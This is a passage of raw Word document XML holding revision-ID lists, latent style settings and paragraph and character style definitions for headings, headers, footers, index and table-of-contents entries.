    <w:rsid w:val="00CA1D6E"/>
    <w:rsid w:val="00CA22F7"/>
    <w:rsid w:val="00CA2429"/>
    <w:rsid w:val="00CB1C7F"/>
    <w:rsid w:val="00CB653D"/>
    <w:rsid w:val="00CC2A84"/>
    <w:rsid w:val="00CC5810"/>
    <w:rsid w:val="00CD7E2D"/>
    <w:rsid w:val="00CE09DB"/>
    <w:rsid w:val="00CE13C5"/>
    <w:rsid w:val="00CE3661"/>
    <w:rsid w:val="00CF0D21"/>
    <w:rsid w:val="00CF1F02"/>
    <w:rsid w:val="00CF6F86"/>
    <w:rsid w:val="00CF6FE8"/>
    <w:rsid w:val="00D014A6"/>
    <w:rsid w:val="00D0573D"/>
    <w:rsid w:val="00D05C2A"/>
    <w:rsid w:val="00D06506"/>
    <w:rsid w:val="00D15F9B"/>
    <w:rsid w:val="00D166F6"/>
    <w:rsid w:val="00D217D1"/>
    <w:rsid w:val="00D31946"/>
    <w:rsid w:val="00D51F84"/>
    <w:rsid w:val="00D52EC6"/>
    <w:rsid w:val="00D55512"/>
    <w:rsid w:val="00D57E27"/>
    <w:rsid w:val="00D60581"/>
    <w:rsid w:val="00D61FE4"/>
    <w:rsid w:val="00D629B4"/>
    <w:rsid w:val="00D65AE8"/>
    <w:rsid w:val="00D73A1E"/>
    <w:rsid w:val="00D745E3"/>
    <w:rsid w:val="00D808FD"/>
    <w:rsid w:val="00D822F6"/>
    <w:rsid w:val="00D90BB4"/>
    <w:rsid w:val="00D9471F"/>
    <w:rsid w:val="00DA799F"/>
    <w:rsid w:val="00DA7BD5"/>
    <w:rsid w:val="00DB3A3C"/>
    <w:rsid w:val="00DB550F"/>
    <w:rsid w:val="00DB6C4E"/>
    <w:rsid w:val="00DC07A0"/>
    <w:rsid w:val="00DC0A1B"/>
    <w:rsid w:val="00DC1893"/>
    <w:rsid w:val="00DC6AA5"/>
    <w:rsid w:val="00DC71A3"/>
    <w:rsid w:val="00DD1368"/>
    <w:rsid w:val="00DE7966"/>
    <w:rsid w:val="00DF1079"/>
    <w:rsid w:val="00DF29A3"/>
    <w:rsid w:val="00DF541C"/>
    <w:rsid w:val="00DF5629"/>
    <w:rsid w:val="00DF5D65"/>
    <w:rsid w:val="00DF6BCF"/>
    <w:rsid w:val="00E05FC9"/>
    <w:rsid w:val="00E117BC"/>
    <w:rsid w:val="00E143CD"/>
    <w:rsid w:val="00E165B7"/>
    <w:rsid w:val="00E166BD"/>
    <w:rsid w:val="00E2001F"/>
    <w:rsid w:val="00E208D3"/>
    <w:rsid w:val="00E2757A"/>
    <w:rsid w:val="00E30A78"/>
    <w:rsid w:val="00E3261C"/>
    <w:rsid w:val="00E35B71"/>
    <w:rsid w:val="00E37216"/>
    <w:rsid w:val="00E43B71"/>
    <w:rsid w:val="00E44D5C"/>
    <w:rsid w:val="00E47AB9"/>
    <w:rsid w:val="00E57BD4"/>
    <w:rsid w:val="00E617FE"/>
    <w:rsid w:val="00E625AA"/>
    <w:rsid w:val="00E638E9"/>
    <w:rsid w:val="00E65142"/>
    <w:rsid w:val="00E736CA"/>
    <w:rsid w:val="00E7569D"/>
    <w:rsid w:val="00E770BF"/>
    <w:rsid w:val="00E81CC3"/>
    <w:rsid w:val="00E83B41"/>
    <w:rsid w:val="00E84CF4"/>
    <w:rsid w:val="00E92707"/>
    <w:rsid w:val="00E9321D"/>
    <w:rsid w:val="00EA496D"/>
    <w:rsid w:val="00EB70BE"/>
    <w:rsid w:val="00EB7BE6"/>
    <w:rsid w:val="00ED58A6"/>
    <w:rsid w:val="00EE018E"/>
    <w:rsid w:val="00EE7DAB"/>
    <w:rsid w:val="00EF4CD3"/>
    <w:rsid w:val="00EF54C9"/>
    <w:rsid w:val="00F00420"/>
    <w:rsid w:val="00F013E7"/>
    <w:rsid w:val="00F021F1"/>
    <w:rsid w:val="00F034CD"/>
    <w:rsid w:val="00F05C18"/>
    <w:rsid w:val="00F12496"/>
    <w:rsid w:val="00F160C0"/>
    <w:rsid w:val="00F23E21"/>
    <w:rsid w:val="00F264B1"/>
    <w:rsid w:val="00F27217"/>
    <w:rsid w:val="00F333F6"/>
    <w:rsid w:val="00F34D21"/>
    <w:rsid w:val="00F37FD6"/>
    <w:rsid w:val="00F414CB"/>
    <w:rsid w:val="00F4175C"/>
    <w:rsid w:val="00F42B64"/>
    <w:rsid w:val="00F43639"/>
    <w:rsid w:val="00F4513E"/>
    <w:rsid w:val="00F54383"/>
    <w:rsid w:val="00F66030"/>
    <w:rsid w:val="00F662BF"/>
    <w:rsid w:val="00F70303"/>
    <w:rsid w:val="00F76BCB"/>
    <w:rsid w:val="00F77345"/>
    <w:rsid w:val="00F809F4"/>
    <w:rsid w:val="00F81FD8"/>
    <w:rsid w:val="00F84925"/>
    <w:rsid w:val="00F90935"/>
    <w:rsid w:val="00F924B5"/>
    <w:rsid w:val="00F93675"/>
    <w:rsid w:val="00F93A3C"/>
    <w:rsid w:val="00F93EE4"/>
    <w:rsid w:val="00F97A84"/>
    <w:rsid w:val="00FA0197"/>
    <w:rsid w:val="00FA133D"/>
    <w:rsid w:val="00FA4D46"/>
    <w:rsid w:val="00FB5FB1"/>
    <w:rsid w:val="00FB7BA0"/>
    <w:rsid w:val="00FC6B12"/>
    <w:rsid w:val="00FC7BBD"/>
    <w:rsid w:val="00FD18FA"/>
    <w:rsid w:val="00FD1B67"/>
    <w:rsid w:val="00FD1EEB"/>
    <w:rsid w:val="00FD36BB"/>
    <w:rsid w:val="00FE0548"/>
    <w:rsid w:val="00FE53ED"/>
    <w:rsid w:val="00FE5C3A"/>
    <w:rsid w:val="00FF0656"/>
    <w:rsid w:val="00FF4835"/>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o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="2"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="7A8B434D"/>
  <w15:docId w15:val="{20826682-AC86-4C8A-9E8B-821FD339BF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2"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault/>
  </w:docDefaults>
  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="heading 1"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locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="footnote text" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="annotation text" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="header" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="footer" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="index heading" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="0"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locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="annotation reference" w:locked="1"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uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="Closing" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Signature" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text" w:locked="1" w:semiHidden="1"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uiPriority="0"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locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text 3" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text Indent 2" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Body Text Indent 3" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Block Text" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Hyperlink" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="FollowedHyperlink" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Strong" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="Emphasis" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="Document Map" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Plain Text" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="E-mail Signature" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Top of Form" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="HTML Bottom of Form" w:locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Normal (Web)" w:locked="1"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locked="1" w:semiHidden="1"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locked="1" w:semiHidden="1"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locked="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="Table Grid"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97051"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:keepNext/>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:hanging="720"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="BodyText"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A55994"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
        <w:tab w:val="num" w:pos="1440"/>
      </w:tabs>
      <w:ind w:left="1440" w:hanging="720"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal3"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="008330A6"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:keepNext/>
      <w:tabs>
        <w:tab w:val="left" w:pos="3060"/>
      </w:tabs>
      <w:ind w:left="2966" w:hanging="806"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="3600" w:hanging="720"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="4320" w:hanging="720"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="5040" w:hanging="720"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="5760" w:hanging="720"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:i/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60"/>
      <w:ind w:left="6480" w:hanging="72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sid w:val="00C22827"/>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:i/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C22827"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="18"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Normal3">
    <w:name w:val="Normal3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="240"/>
      <w:ind w:left="2160"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00A0091A"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00A0091A"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="480" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="960" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="1200" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="1440" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="1680" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="1920" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="3960"/>
      </w:tabs>
      <w:ind w:left="2160" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Index1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A9493A"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A9493A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
